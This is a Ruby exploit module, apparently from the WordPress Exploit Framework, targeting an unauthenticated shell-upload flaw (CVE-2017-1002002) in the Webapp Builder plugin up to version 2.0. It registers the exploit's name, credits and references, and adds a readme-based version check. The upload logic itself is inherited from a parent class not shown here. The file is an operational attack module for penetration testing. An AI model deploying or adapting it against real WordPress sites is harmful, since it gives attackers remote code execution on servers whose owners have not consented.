# frozen_string_literal: true

class Wpxf::Exploit::WebappBuilderShellUpload < Wpxf::Exploit::MobileAppNativeV3ShellUpload
  def initialize
    super

    update_info(
      name: 'Webapp Builder <= 2.0 Unauthenticated Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery and disclosure
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8773'],
        ['CVE', '2017-1002002'],
        ['URL', 'http://www.vapidlabs.com/advisory.php?v=181']
      ],
      date: 'Mar 01 2017'
    )
  end

  def check
    check_plugin_version_from_readme(plugin_name)
  end

  def plugin_name
    'webapp-builder'
  end
end
